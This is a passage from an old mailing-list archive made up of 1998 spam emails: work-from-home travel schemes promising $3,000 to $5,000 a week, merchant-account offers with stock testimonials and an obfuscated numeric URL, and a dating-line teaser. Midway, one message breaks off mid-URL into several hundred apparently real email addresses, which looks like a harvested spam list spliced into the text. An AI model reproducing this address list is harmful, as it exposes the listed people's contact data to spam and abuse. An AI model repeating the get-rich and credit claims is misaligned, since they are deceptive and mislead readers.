operano nel settore "high-tech"  e nella biotecnologia in particolare
perch, come l'esperienza americana insegna, solo l'unione delle diverse
discipline (scientifica, giuridica, finanziaria ed economica) pu creare
tutte le sinergie utili allo sviluppo di questo settore.

Se gradisce maggiori informazioni sulla nostra attivit pu visitare il
nostro sito internet: http://www.lamarck.com, oppure pu contattarci alla nostra e-mail:lamarck@sis.it

RingraziandoLa per l'attenzione accordataci Le inviamo i nostri pi
distinti saluti,

J.  Lamarck 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMaflk@msn.com
Date: Thu, 17 Dec 1998 11:24:31 -0800 (PST)
To: people1@aol.com
Subject: Free Cruise for 2!  Home Based Travel Biz!
Message-ID: <44338780_95842366>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 651
Lines: 30



    Fire Your Boss And Kill the Alarm Clock!

                        WE DID!

           Travel for pennies and Get paid!
          Enjoy a complimentary Cruise for 2 

   Make $3,000 to $5,000 a week and never
                   leave your home.


We're looking for people with good work ethics
and extraordinary DESIRE who want to change
their lives.  We'll give you all the training and
support that you need to insure your success.

And if we can do it...so can you!

This is not Multi-Level Marketing or GPG.
Now you can "Make Your Vocation A Vacation"

Call NOW for information
Here's a 24 hr. TOLL FREE Number
1-800-345-9688  Ext. 1250
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cindy" <cnpot@lycosmail.com>
Date: Thu, 17 Dec 1998 20:41:11 -0800 (PST)
Subject: Between our..
Message-ID: <199812180439.FAA06758@pat.telenor.no>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 765
Lines: 34




NO TRICKS - IT'S FREE! Process all major credit cards on your web
site.
NO MONTHLY COSTS, NO TRANSACTION FEES. CHECK IT OUT. You get:

- Virtual Terminal for phone/fax/mail orders
- Email receipt
- Recurring billing feature
- Password generation for membership sites
- Automatic batch closing
- Address Verification Service (AVS)
- Backoffice to access account history
- Remote mode
- Interface for all major shopping carts
- Installation included

For our free information package just reply to:
mailto:ccard@topchat.com?subject=more_info

If you are interested in becoming an authorized
agent please reply to:
mailto:ccard@topchat.com?subject=agent

If you wish to be removed from our mailing list
please reply to:
mailto:calph7@yahoo.com?subject=remove







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DVetoiy@worldnet.att.net
Date: Sat, 19 Dec 1998 11:35:31 -0800 (PST)
To: people1@aol.com
Subject: We Love it!$!  Travel, Money, and.....
Message-ID: <12507235_19217380>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 782
Lines: 39




FIRE THE BOSS AND BREAK THE ALARM CLOCK!
                        WE DID!

Travel for pennies on the dollar
                        And
Enjoy a complimentary cruise for two!

MAKE $3000-$5000 PER WEEK FROM HOME!
 

Read on, if you're an entrepreneur or have always wanted to be 
your own BOSS.  We supply state-of-the-art training and a
support system that you will need to ensure your success!

     
We are only looking for FOCUSED, serious entrepreneurs,
(PT/FT) with the EXTRAORDINARY  DESIRE  to improve
their lifestyle immediately.

Not Multi-level Marketing or GPG

MAKE YOUR VOCATION A VACATION"

CALL NOW FOR INFORMATION
24 HOUR TOLL FREE NUMBER

1-888-376-0353


PS:  DO NOT CALL US IF YOU'RE LAZY,  LOOKING
FOR A "GET RICH QUICK"   SCHEME OR  JUST SOME
EXTRA CASH.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Qtgab11@aol.com
Date: Sat, 19 Dec 1998 18:27:30 -0800 (PST)
Subject: Watch Your Sales Roll In With A Merchant Account!
Message-ID: <e2243580.367c5035@aol.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 21358
Lines: 921


ARE YOU LOSING $1000s PER MONTH?

MISSING THE INTERNET E-COMMERCE RIDE?COULD YOU USE MORE BUSINESS? SALES SLOW?


WE CAN HELP!!! BY ACCEPTING ALL MAJOR CREDIT CARDS, YOUR BUSINESS CAN INCREASE
SALES UP TO 1500%!!!


E-COMMERCE SOLUTIONS STARTING UNDER $50.00 GOOD CREDIT, BAD CREDIT, NO CREDIT
OK!! 

 

PRE-APPROVED APPLICATION!!FREE APPLICATION AND SET-UP FEES!! ($340.00
SAVINGS)ACCEPT VISA, MASTERCARD, AMEX, DISCOVER AND CHECKS IN YOUR BUSINESS!

ACCEPTING CREDIT CARDS & CHECKS ON YOUR WEBSITE IS AN ABSOLUTE NECESSITY IN
TODAY'S INTERNET MARKETPLACE!E-COMMERCE SOLUTIONS STARTING UNDER $50.00ACT NOW
AND GET YOUR ACH CHECKING BSOLUTELY FREE!!

 

Don't take our word for it, take theirs....

Testimonial #1 -  "This is the best thing I ever did.  My website business
hasincreased at least 250% by being able to give my customers the
availabilityof secure credit card transactions.  We can now take orders from
all overthe world, 24 hours per day." - K.L./AL

Testimonial #2 - "Pre-approved application? Right! My doubts were erased whenI
got the approval.  Having been turned down at my local bank, I was
veryskeptical, however, within 14 days I was accepting credit cards and
mybusiness has definitely prospered.  I enjoy saying, will that be cash
orcredit? Thanks." - B.C./FL

Testimonial #3 - "Initially I did not even know what a merchant acount
was.When told by my web hosting company that I needed a merchant account to do
e-commerce transactions I did not know where to turn. Responding to an ad, I
wasamazed at the ease of implimentation of your services. I am grateful and
veryprofitable thanks to you." - F.R./NMTestimonial #4 - "Having a second
income for my family has made my life mucheasier.  Accepting credit cards on
my website has been the easiest thing Ihave ever done, I recommend this
program to everyone with a home-basedbusiness." -G.T./NY

 

                  ACT NOW!!!  THIS IS A LIMITED TIME OFFER!!!

 

Enter The Following URL Into Your Web Browser To Register:

http://3456968599/userap/ma/nm.htmle.com
1snake1@iglou.com
1snake1@iglou2.iglou.com
1st@1staff.com
1stannap@interserv.com
1star@ktassoc.com
1stbooks@neta.com
1stbreak@tcel.com
1stcfd158288@pipeline.com
1stchiro@netstorage.com
1stchoice@deltanet.com
1stclass@interlog.com
1stfamily@qualityservice.com
1stnet@wwdc.com
1stnews@lwire.com
1stnoel@netcom.com
1storder@suzton.com
1streference@comports.com
1st_inst@dnai.com
1sunlife@interlog.com
1superge@coffeenews.com
1swift1@mlode.com
1swomimi@magic.itg.ti.com
1timmer@cml.com
1tps@cris.com
1traveler@frodo.com
1wilcox@mail.gld.com
1wwg2104@mustang.com
99@cryogen.com
99@kaiwan.kaiwan.com
99@kaiwan009.kaiwan.com
99@spies.com
99cents@99centsamin.com
99obrien@novell.wd.cubic.com
99th@myna.com
9@kretin.infoserv.com
9@niagara.com
9@salata.com
9a@prodigyl.com
9ab14@dial.pipex.com
9ab47@dial.pipex.com
9adopt4@cwo.com
9adopt@oro.com
9c9@news.xroads.com
9camber@primenet.com
9chav@river.biddeford.com
9cwatson@ssnet.com
9duelist@wizards.com
9eeplb@go01.comp.pge.com
9efaddies@xe.com
9elric@mango.aloha.com
9flyer@pentagon.io.com
9gmarshall@halcyon.com
9gto@dlep1.itg.ti.com
9hd@camel0.mindspring.com
9inarow@hahaceltic.com
9info@bigfoot.com
9lorkin@winvmj.vnet.ibm.com
9lorkin@winvmj.vnetibm.com
9mm@9mm.com
9muses@magi.com
9narco@netcom.com
9net@csgi.com
9news@abilene.com
9nfindley@neosoft.com
9oa@alpha.nafb.trw.com
9oa@alpha.nafb.trw.comccww
9point9@oregonobserver.com
9proler@bga.com
9pwilliams@rhp.com
9qjvc085yn@mv.com
9scottm@ecn.com
9secstang@sleeper.com
9smarttec@qns.com
9steves@primenet.com
9uhs@connectnet.com
9wallmr@bedfont.uk.ibm.com
9whitij@asicvm1.vnet.ibm.com
9whitij@asicvm1.vnetibm.com
9william.padilla@panasia.com
9willis@qnet.com
a.akinbola@cgnet.com
a.arslan@link-do.donut.ruhr.com
a.aysan@internetmci.com
a.b.dryburgh@btinternet.com
a.b.ferguson@btinternet.com
a.b.schmitz@westend.com
a.b@ano.com
a.b@never_mind.com
a.baker@colosseum.com
a.benjamin@mi04.zds.com
a.bentzien@ndh.com
a.bentzien@public.ndh.com
a.bergland@bigfoot.com
a.bernacki@smtphost.elsevier.com
a.blade@coolone.com
a.bond@research-int.com
a.boone@kainos.com
a.bopp@www.mebbs.com
a.bordow@news.connectnet.com
a.bostock@btinternet.com
a.bridge@trl.telstra.com
a.briell@westend.com
a.brouwer@daftrucks.com
a.bsu.religion@radish.interlink-bbs.com
a.buturovic@berwanger.com
a.c.e.co@netzone.com
a.c.frerichs@sncper.simis.com
a.c.frerichs@sncper.simis.com
a.c.harris@btinternet.com
a.c.munday@btl4ip.boat.bt.com
a.c@xio.com
a.cantor.cantor@mv.com
a.castles@kainos.com
a.cole1@genie.geis.com
a.concerned.mother@lunatic.com
a.coverly@sattelcom.com
a.dcheck.associates@execon.com
a.d.check.associates@execon.com
a.d.ferguson@att.com
a.d.jones@btinternet.com
a.d.s@btinternet.com
A.Daair@rocketmail.com
a.damon@bmts.com
a.davis@oakland.raiders.com
a.dcheck.associates@execon.com
a.deepak@stcnet.com
a.dejong@profs.pf232.spbhag.simis.com
a.deslandes@genie.geis.com
a.devos@research.kpn.com
a.dewolf@fl.gte.com
a.dewolf@gtenet.com
a.dewolf@tel.gte.com
a.dobermann@cgnet.com
a.duffy@innet.com
a.e.c.net@eznetny.com
a.e@pacifex.com
a.erfani@mci2000.com
a.farmer@ol.com
a.fiegel@genie.geis.com
a.friend@dlbbs.com
a.friend@geocities.com
a.friesen@az05.bull.com
a.g.j.sprang@nl.cis.philips.com
a.g.n.pfaffe@siep.shell.com
a.g.thomas@comco.com
a.gales@dial.pipex.com
a.gall@phnxsoft.com
a.gardo@skovde.mail.telia.com
a.gasser@tirol.com
a.gathering.of.the.tribes@grist.com
a.gault@interaccess.com
a.geertsma@nym.sc.philips.com
a.gentman@topcat.cld9.com
a.gilani@dialogic.com
a.gilmore@kainos.com
a.godfree@dial.pipex.com
a.goldfine@genie.geis.com
a.grimstad@att.com
a.gudmundsson@cc.bellcore.com
a.gutman@sbf.com
a.guttke@karlstad.mail.telia.com
a.guyon@btinternet.com
a.h.d@btinternet.com
a.h.e.m.terwindt@research.kpn.com
a.h.gilmore@openmail1.uesi.simis.com
a.h.nordin@hudiksvall.mail.telia.com
a.hampster@btinternet.com
a.hansen2@genie.geis.com
a.harwood@msmail.trctho.simis.com
a.havewala@zds.com
a.haxby@siep.shell.com
a.hayden@analog.com
a.hellwig@softgold.com
a.heyes@btinternet.com
a.holleman@mpn.cp.philips.com
a.hoogervorst@inter.nl.com
a.huey@genie.geis.com
a.hyder@segaworld.com
a.ignacio@internetmci.com
a.insley@hill.com
a.j.deboer@research.kpn.com
a.j.f.vanhalderen@research.kpn.com
a.j.frost@btl1ip.boat.bt.com
a.j.galbraith@dial.pipex.com
a.j.j.brevoort@research.kpn.com
a.j.owens@btinternet.com
a.j.prater@daytonoh.attgis.com
a.j.saveriano@lightspeed.com
a.j.savoy@mail.sstar.com
a.j.schepis@gooey.com
a.j@unknown.address.com
a.judith@runnet.com
a.k.westers@openmail.csn41.namass.simis.com
a.kaeufer@ndh.com
a.karlsson@vaggeryd.mail.telia.com
a.katwala@glass.jecsystems.com
a.kayedk@crl.com
a.kirch@westend.com
a.kleifges@public.ndh.com
a.krisinger@public.ndh.com
a.krueger@public.ndh.com
a.kupries@westend.com
a.l.a.jacobs@nl.cis.philips.com
a.l.p@chica.com
a.langdon@canrem.com
a.lillich@applelink.apple.com
a.lua.id@ardennes.com
a.m.a.wouters@research.kpn.com
a.m.oudshoff@research.kpn.com
a.m.vanderhoeve@openmail.tpl62.namvna.simis.com
a.mabry@utf4.utelfla.com
a.macarthur@btinternet.com
a.malik@ma30.bull.com
a.marumoto@mail.shareinfo.com
a.mcbay@poboxes.com
a.mcintosh@lilly.com
a.mcintyre@btinternet.com
a.mcquillan@dial.pipex.com
a.mellberg@surahammar.mail.telia.com
a.miao@post1.com
a.monticchio@cc.bellcore.com
a.muir@muirco.u-net.com
a.munson1@genie.geis.com
a.murraysmith@gdn1gu.boat.bt.com
a.mursch@wastage.infox.com
a.nerd@netcom.com
a.nieuwkoop@nl.cis.philips.com
A.Nomymous@nowhere.com
a.non@someplace.tymnet.com
a.nonpartisan.observer@home.com
a.noren@goteborg.mail.telia.com
a.oates@geac.com
a.olson@pro-babbage.cts.com
a.olsson@valdemarsvik.mail.telia.com
a.p.h.vanrooijen@research.kpn.com
a.p.hope@btinternet.com
a.p.murrah@mourner.com
a.palekar@architel.com
a.palmer@kainos.com
a.paralegal@internetmci.com
a.parkhouse@btinternet.com
a.paul.morris@gecm.com
a.pecchia@resonet.com
a.pelzner@westend.com
a.person@net.com
a.petersen@pobox.com
a.phillips5@genie.geis.com
a.phillps5@genie.geis.com
a.pinheiro@edina.xenologics.com
a.pinheiro@edina.xnc.com
a.podlecki@att.com
a.pokras@roche.com
a.poots@dial.pipex.com
a.prater@daytonoh.attgis.com
a.r.n@btinternet.com
a.r.smarty@eden.com
a.redlich@realogic.com
a.reid@bigfoot.com
a.richrath@edina.xenologics.com
a.roeseler@att.com
a.roguish.fellow@south.austin.com
a.rudnitsky@techsmith.com
a.ruecker@doo.donut.ruhr.com
a.s.i.moosa@technologist.com
a.s@hollywood.com
a.sand@mci2000.com
a.schalkoort@sncper.simis.com
a.schinke@viking.ruhr.com
a.schlafley@isd.k12.us.mi.com
a.schoetz@public.ndh.com
a.schuster@wunsch.com
a.schwartz@architel.com
a.schwertner@edina.xnc.com
a.segal@elsevier.com
a.seier@link-do.donut.ruhr.com
a.seier@linkdo.donut.ruhr.com
a.sela@snet.com
a.sifford1@genie.geis.com
a.soo@applelink.apple.com
a.spark@dial.pipex.com
a.symann@pop.du.gtn.com
a.szollosi@isnl.simis.com
a.szymczak1@genie.geis.com
A.The.Merry.Mutan@467.parasol.stat.com
a.trapp@edina.xenologics.com
a.triolo@att.com
a.turner1@genie.geis.com
a.vachhergnanathurai@fourd.com
a.voelker@public.ndh.com
a.vogel1@genie.geis.com
a.vtorygin@raceusa.com
a.w.bitts@cummins.com
a.w.d@btinternet.com
a.wakefield@kainos.com
a.watson@genie.geis.com
a.weitzner@lucent.com
a.wigman@dial.pipex.com
a.wood@btinternet.com
a.woodcock@dial.pipex.com
a.wooten@genie.geis.com
a.zentner@genie.geis.com
a0002@mad167.dnet.ge.com
a0002@mad167.dnetge.com
a0002@mad168.dnet.ge.com
a0002@mad168.dnetge.com
a00048@cjm3k.wpl.com
a0011723@airmail.com
a0014571@dlep1.itg.ti.com
a0014571@dsks52.itg.ti.com
a002510@rd821.gleason.com
a0034@happy.ail.com
a0042724@dlep1.itg.ti.com
a007@m5.com
a0098188@dlep1.itg.ti.com
a0115810@dlep1.itg.ti.com
a0120237@dlep1.itg.ti.com
a0130481@dlep1.itg.ti.com
a0130497@lobby.ti.com
a01340@alec.tus.allied.com
a0143989@dsbs15.itg.ti.com
a0149974@dlep1.itg.ti.com
a0167221@dlep1.itg.ti.com
a0175130@dsks52.itg.ti.com
a0181842@dseg.ti.com
a0183015@dlep1.itg.ti.com
a0183046@dlep1.itg.ti.com
a0183046@dsks65.itg.ti.com
a0183415@fstop.csc.ti.com
a0185439@ti.com
a0192834@dlep1.itg.com
a0192836@dlep1.itg.ti.com
a0194687@dflmail.itg.ti.com
a0195440@dskmm51a.itg.ti.com
a0197653@dlemail2.itg.ti.com
a0197700@dlep1.itg.ti.com
a0197725@awesome.itg.ti.com
a0197842@dsbs15.itg.ti.com
a0198631@dlep1.itg.ti.com
a01@mdbesf.mdbe.com
a01read-skyfox.usask.cainternet@livewire.portal.com
a0200429@dlep1.itg.ti.com
a0201791@dlep1.itg.ti.com
a0202003@lobby.ti.com
a0204183@dlep1.itg.ti.com
a0205517@dsbmail.itg.ti.com
a0207287@mkcase1.dseg.ti.com
a0207584@dskp3.itg.ti.com
a0207789@dseg.ti.com
a0207893@convx1.dseg.ti.com
a0208041@dflmail.itg.ti.com
a0208219@shhp715e.dseg.ti.com
a0208219@shhp827.dseg.ti.com
a0208360@dflmail.ti.com
a0210511@swap.dseg.ti.com
a021673@erols.com
a026120@goodyear.com
a0322633@dlep1.itg.ti.com
a0353225@dazs13.itg.ti.com
a0353248@dlep1.itg.ti.com
a036450@rd821.gleason.com
a0383577@dlep1.itg.ti.com
a0384044@dtes13.itg.ti.com
a03rllmr@attmail.com
a040130@rd821.gleason.com
a0401781@dlep1.itg.ti.com
a0459396@dshmail.itg.ti.com
a0459887@dshs1.itg.ti.com
a0460010@shsun3.dseg.ti.com
a0460010@shsun5.dseg.ti.com
a0460537@dseg.ti.com
a049342@b4a206.mdc.com
a0506@world.std.com
a0557325@netvigator.com
a05wlehotz@attmail.com
a0654184@dlep1.itg.ti.com
a0673445@dmhs99.tijp.ti.com
a0743340@dlep1.itg.ti.com
a0766826@dlep1.itg.ti.com
a077833@mdcpo03.mon.mdc.com
a0783627@dlep1.itg.ti.com
a0783628@dlep1.itg.ti.com
a07inappr@attmail.com
a0831294@dlep1.itg.ti.com
a0838082@dlep1.itg.ti.com
a0839859@dlep1.itg.ti.com
a0842283@dseg.ti.com
a0842283@lesol1.dseg.ti.com
a0842352@dlep1.itg.ti.com
a08696@mailhub.wpl.com
a08762@mailhub.wpl.com
a0882072@dlep1.itg.ti.com
a0906078@dlep1.itg.ti.com
a0908327@dlep1.itg.ti.com
a0928030@dlep1.itg.ti.com
a0928030@itg.ti.com
a0942263@dsks52.itg.ti.com
a0952873@hsxsrv.dseg.ti.com
a0979636@dlep1.itg.ti.com
a09876@gnn.com
a09r@tmp.medtronic.com
a0@access.digex.com
a1-jacs@i-link.com
a1.clust.clust.umc@engult.lxe.com
a1.usa.umc@mailgate.glaxo.com
a10013@email.mot.com
a1002@monmouth.com
a10035@email.mot.com
a1004a@travelgazette.com
a101687@bga.com
a101687@realtime.com
a10190@email.mot.com
a10271@email.mot.com
a1027@cris.com
a10377@corp.mot.com
a10377@email.corp.mot.com
a10377@email.mot.com
a10636@email.mot.com
a10636@laotzu.corp.mot.com
a1089sos@hkstar.com
a10c4i@localnet.com
a11.sale@jonspewak.com
a110@sunlife.com
a1117777@hkstar.com
a1128@netvigator.com
a112@abcd.com
a11402@email.corp.mot.com
a11516@email.mot.com
a120237@lobby.ti.com
a12077@email.mot.com
a1208@hotmail.com
a121331234@post1.com
a123456@www23.com
a12345@hkstar.com
a1234@mindspring.com
a123@dlcc.com
a12482@email.mot.com
a127094@hp8001.fpp.com
a128848@fpp.com
a12981@email.mot.com
a12b6@primenet.com
a12taipo@hkstar.com
a1306@primenet.com
a131741@hp7008.fpp.com
a13279@email.mot.com
a138575@pop.nl.cis.philips.com
a139271@sgi001.fpp.com
a13man@netaxs.com
a142272@adam.dseg.ti.com
a1422c@email.mot.com
a145827@dseg.ti.com
a148351@fpu073.fpp.com
a149153@se77.dseg.ti.com
a149153@sh56.dseg.ti.com
a15184@hotmail.com
a16jberc@attmail.com
a16msafley@attmail.com
a170997@news.dseg.ti.com
a176185@escher.msp.sc.ti.com
a182629@dseg.ti.com
a182629@ibasee3.dseg.ti.com
a182629@itasee2.dseg.ti.com
a183111@moe.dseg.ti.com
a183855@se82.dseg.ti.com
a183855@skopen.dseg.ti.com
a186329@dseg.ti.com
a186430@moe.dseg.ti.com
a187119@tilde.csc.ti.com
a187155@pooh.msp.sc.ti.com
a187420@erbium.msp.sc.ti.com
a188083@linus.msp.sc.ti.com
a188083@matisse.msp.sc.ti.com
a188103@linus.mem.ti.com
a1901@gramercy.ios.com
a1911a@pipeline.com
a1911a@usa.pipeline.com
a1918@chelsea.ios.com
a1929@tribeca.ios.com
a193518@mksol.dseg.ti.com
a193522@mcopn1.dseg.ti.com
a195722etd.decnet@mdcgwy.mdc.com
a195778@node_3b9fc.mem.ti.com
a1957jbk@thecore.com
a19592@waccvm.corp.mot.com
a195982@msp.sc.ti.com
a195982@owl.msp.sc.ti.com
a196028@ohm.msp.sc.ti.com
a196223@msp.sc.ti.com
a197803a@hkstar.com
a1981981@netvigator.com
a19974@waccvm.corp.mot.com
a19@en.com
a1@anon.com
a1@bpworld.com
a1@comnet.com
a1@nbn.com
a1@sfov1.verifone.com
a1@verifone.com
a1amway@cyberpromo.com
a1b2c3e4@pipeline.com
a1b2c3e4@usa.pipeline.com
a1bko@tribeca.ios.com
a1comm@pop.erols.com
a1consult@pwrnet.com
a1consulting@pwrnet.com
a1dad@hotmail.com
a1gomes@mrtony.ultranet.com
a1health@sprynet.com
a1idpierat@kewl.com
a1idpirat@kewl.com
a1info@a1co.com
a1jacs@ilink.com
a1lock@ocsonline.com
a1mcdee@interoz.com
a1phil@metroslave.metroslave.com
a1s@icf.hrb.com
a1service@interramp.com
a1sexyguy@usa.pipeline.com
a1support@a1co.com
a1travl@loclnet.com
a1video@hotmail.com
a1webdesign@geocities.com
a1xxxcpl@gnn.com
a1_koess_grimes_rwemail@delcoelect.com
a1_nyneve_hardy_demail@delcoelect.com
a2.33@death.com
a2.bill@genie.geis.com
a20002@email.sps.mot.com
a2000@sprynet.com
a200438@vantage.fmr.com
a201257@sd92.com
a201257@sd92.dseg.ti.com
a202651@dseg.ti.com
a204908@fmr.com
a205278@dsbmail.itg.ti.com
a206849@asd470.dseg.ti.com
a206849@lesol1.dseg.ti.com
a207627@fmr.com
a207706@moe.dseg.ti.com
a207718@moe.dseg.ti.com
a207746@texas.dseg.ti.com
a20788@bigbird.tus.allied.com
a208013@lobb.ti.com
a208055@jasmine.fmr.com
a208577@sneezy.vantage.fmr.com
a208@sunlife.com
a209928@vantage.fmr.com
a20@primenet.com
a210518@texas.dseg.ti.com
a210566@texas.dseg.ti.com
a216004norvs1@x400gw.etn.com
a219487@etd88a.mdc.com
a2217@hotmail.com
a229aa@email.sps.mot.com
a23169@email.mot.com
a233@iglou.com
a23432@useworld.com
a234@erols.com
a2427806@sprynet.com
a24755@waccvm.corp.mot.com
a24756@hkstar.com
a25152@waccvm.corp.mot.com
a25627@vm.algoma.com
a26mber@hotmail.com
a2771@shafi.dell.com
a2783456@netvigator.com
a2845@worldshop.com
a2890@netvigator.com
a291750@hkstar.com
a291@hotmail.com
a293@hkstar.com
a2@primenet.com
a2@verifone.com
a2bis2b@gnn.com
a2brute@wbmls.ca.boeing.com
a2cpl@hotmail.com
a2dcem@numbers.com
a2jim@usa.pipeline.com
a2mailcamhlotus.lotus@crd.lotus.com
a2mpt@bizserve.com
a2p6x5fv@abaco.coastalnet.com
a2s3k4wm@abaco.coastalnet.com
a2xxxlinks@psychonet.com
a2z@keydesign.com
a2z@netaxis.com
a2z@nowhere.com
a2zcomp@cris.com
a2_inc@usa.pipeline.com
a3023@worlshop.com
a3028@worldshop.com
a30400996@hotmail.com
a3060037@hkstar.com
a320732@liveoak.wotangate.sc.ti.com
a320732@offenbach.wotangate.sc.ti.com
a320732@walnut.wotangate.sc.ti.com
a3295@hotmail.com
a335@mail.dxr.com
a340@idirect.com
a341dsudduth@attmail.com
a341rpohl@attmail.com
a3428@hknet.com
a343jbrinsko@attmail.com
a3462@netvigator.com
a347lclark@attmail.com
a347lfiedler@attmail.com
a349mgreenle@attmail.com
a34@lover.com
a35r@tmp.medtronic.com
a360b360@netvigator.com
a363674@aadt.com
a364214@aadt.com
a3780@iglou.iglou.com
a388351@sdt.com
a399019@ska.com
a3@wworlds.jd.com
a3dguy@escape.com
a3dmator@dnai.com
a4003h@dseg.ti.com
a403122@netvigator.com
a4141@adjiriarts.com
a434@erols.com
a43wer8@jumbo.com
a440@interlog.com
a440tech@loop.com
a447@msg.ti.com
a454930@mksol.dseg.ti.com
a458rs@mcsds.com
a465@best.com
a48435248752654@hotmail.com
a49er@netcom.com
a49erfan@nyc.pipeline.com
a4dable@a4dable.com
a4dwald@msg.pacbell.com
a4m@mcs.com
a4poe9@westnet.com
a4slam@srv.pacbell.com
a4ssinc@pacbell.com
a4x4@indirect.com
a50146w8@awinc.com
a50154w8@awinc.com
a50154w8@awnet.com
a50177w8@awnet.com
a50178w8@awnet.com
a50223w8@awnet.com
a50321w8@awnet.com
a50341w8@awinc.com
a50341w8@awnet.com
a5048@geocities.com
a50806@gjpomail.doegjpo.com
A50VM1.TRG.NYNEX.CO@CUVMB.CC.com
A50VM1.TRG.NYNEX.COM@CUVMB.CC.com
a5271226@netvigator.com
a545544@erols.com
a55445@tribeca.ios.com
a571@iglou.com
a587338@ska.com
a596671@ska.com
a599517@ska.ska.com
a5y5p3mh@abaco.coastalnet.com
a60784@pan.mc.ti.com
a60910@netvigator.com
a609587@verleihnix.ska.com
a6190908@netvigator.com
a63strat@dreamscape.com
a65z1@idirect.com
a66299@eskom.it.com
a66rmpandv02@gmr.com
a6728376@sprynet.com
a677030@anz.com
a6801093@netvigator.com
a68xke@erols.com
a691645@dseg.ti.com
a69768@ganesh.mc.ti.com
a69768@news.mc.ti.com
a69768@pan.mc.ti.com
a6@netcom.com
a6zero@azstarnet.com
a700102@aetna.com
a711364@netvigator.com
a716955@hkstar.com
a7204@texoma.com
a722556@pan.mc.ti.com
a722756@pan.mc.ti.com
a722756@roper.mc.ti.com
a723601@pan.mc.ti.com
a724431@flash.mc.ti.com
a724467@bart.mc.ti.com
a725911@pan.mc.ti.com
a726137@pan.mc.ti.com
a726226@shiva.mc.ti.com
a729849@msp.sc.ti.com
a733857@ska.com
a73818@wf.com
a740728@tiuk.ti.com
a740778@server1.tiuk.ti.com
a740982@server1.tiuk.ti.com
a741009@server1.tiuk.ti.com
a749883@pan.mc.ti.com
a750095@pan.mc.ti.com
a750172@mech-smtp.mc.ti.com
a750172@pan.mc.ti.com
a750288@pan.mc.ti.com
a750318@pan.mc.ti.com
a750531@msg.mc.ti.com
a751812@pan.mc.ti.com
a752086@pan.mc.ti.com
a752186@pan.mc.ti.com
a752489@pan.mc.ti.com
a754458@snoopy.mc.ti.com
a755aa@email.mot.com
a7883@en.com
a7cne30g@microceo.ixfnet.com
a7fu03ho@netvigator.com
a800@erols.com
a802363@pan.mc.ti.com
a804363@stealth.mc.ti.com
a825199@stealth.mc.ti.com
a826056@pan.mc.ti.com
a842051@dseg.ti.com
a842051@lvdc48.dseg.ti.com
a842410@dseg.ti.com
a877728@strange.uk.ti.com
a877728@tiuk.ti.com
a8812@sprynet.com
a884@village.ios.com
a888@hknet.com
a888@hotmail.com
a8@cybrport.com
a8@hell.com
a9013@idirect.com
a903309@server1.tiuk.ti.com
a904044@tiuk.ti.com
a904209@pluto.tiuk.ti.com
a904209@server1.tiuk.ti.com
a905103@server1.tiuk.ti.com
a905103@tiuk.ti.com
a905576@crazy.tiuk.ti.com
a905576@crazy.uk.ti.com
a905576@elrod.tiuk.ti.com
a905576@tiuk.ti.com
a906048@tiuk.ti.com
a906113@pugwash.tiuk.ti.com
a906270@tiuk.ti.com
a907932@nast0.bdy.wi.ameritech.com
a908301@tiuk.ti.com
a908570@server1.tiuk.ti.com
a908591@tiuk.ti.com
a909929@tiuk.ti.com
a909937@getafix.tiuk.ti.com
a909947@tiuk.ti.com
a909948@strange.tiuk.ti.com
a909980@tiuk.ti.com
a926092@netvigator.com
a92miata@erols.com
a948r35@aixssc.uk.ibm.com
a95supp@connectix.com
A99182@izzy.mmm.com
a992btw@nonet.com
a999roses@hotmail.com
a9@btr.btr.com
a9@btr.com
a9@public.btr.com
a9sheppa@midget.hursley.ibm.com
adslkfjlsdakf@lksjdlfkjsldkf.com
alskjreoi@aoieurmvd.com
a@a.com
a@aliroo.com
a@apollo.hp.com
a@b.b.wishing.com
a@b.c.com
a@b.com
a@bbn.com
a@castles.com
a@ccmail.ceco.com
a@ccnet.com
a@cho006.cho.ge.com
a@cisco.com
a@collideascope.com
a@cris.com
a@crl.com
a@cycor.com
a@deepcove.com
a@dev.com
a@eden.com
a@engvax.picker.com
a@fisons.com
a@geomatics.com
a@gw2kbbs.com
a@interramp.com
a@ismore.com
a@jpmorgan.com
a@k.com
a@kcts.com
a@lamg.com
a@lilly.com
a@lincoln.gpsemi.com
a@lubynsky.com
a@mail-e2b-service.gnn.com
a@mail.mother.com
a@megaweb.com
a@mindspring.com
a@moa.com
a@montrouge.ts.slb.com
a@msgw.vf.mmc.com
a@msm.cdx.mot.com
a@msmail.aai.arco.com
a@netcom.com
a@netusa1.com
a@netzone.com
a@niagara.com
a@npri6.npri.com
a@ns1.koyote.com
a@o.com
a@po.com
a@primenet.com
a@prostar.com
a@pscdp3.swindon.gpsemi.com
a@rescueinfo.com
a@sol.rtsg.mot.com
a@telerama.lm.com
a@tezcat.com
a@valmet.com
a@vnabrw.enet.dec.com
a@z.com
aa-2@deltanet.com
aa.azevedo@internetmci.com
aa04@dial.pipex.com
aa061@dial.pipex.com
aa06970@miner.com
aa0fm@vexcel.com
aa103@hotmail.com
aa143@dial.pipex.com
aa14893@inet1.tek.com
aa168292@netvigator.com
aa18@dial.pipex.com
aa1al@neca.com
aa1kf@dewco.com
aa21@dial.pipex.com
aa2345@netstar.com
aa29625@nsc.nsc.com
aa2@deltanet.com
aa2@news.preferred.com
aa2du@netcom.com
aa349@freenet.carleton.com
aa383@dial.pipex.com
aa39309@inet1.tek.com
aa3dc@westol.com
aa4030@hkstar.com
aa46@dial.pipex.com
aa4ga@contesting.com
aa5yc@bga.com
aa5yc@realtime.com
aa60@poczta.com
aa63@dial.pipex.com
aa6aa@netcom.com
aa6eg@tmx.com
aa6g@best.com
aa6ok@mail.mother.com
aa6ok@mother.com
aa6vn@bdt.com
aa6wg@directnet.com
aa7887@erols.com
aa7pd@sisna.comm
aa7pd@sisna.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: www.hk.super.net/
Date: Mon, 21 Dec 1998 14:02:41 -0800 (PST)
To: http://www.emphasis.com/
Subject: the greatest date line in america!!
Message-ID: <23-ki02154re-98 (199.171.57.2)>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 548
Lines: 38






			

			FELLING LONELY TONIGHT?


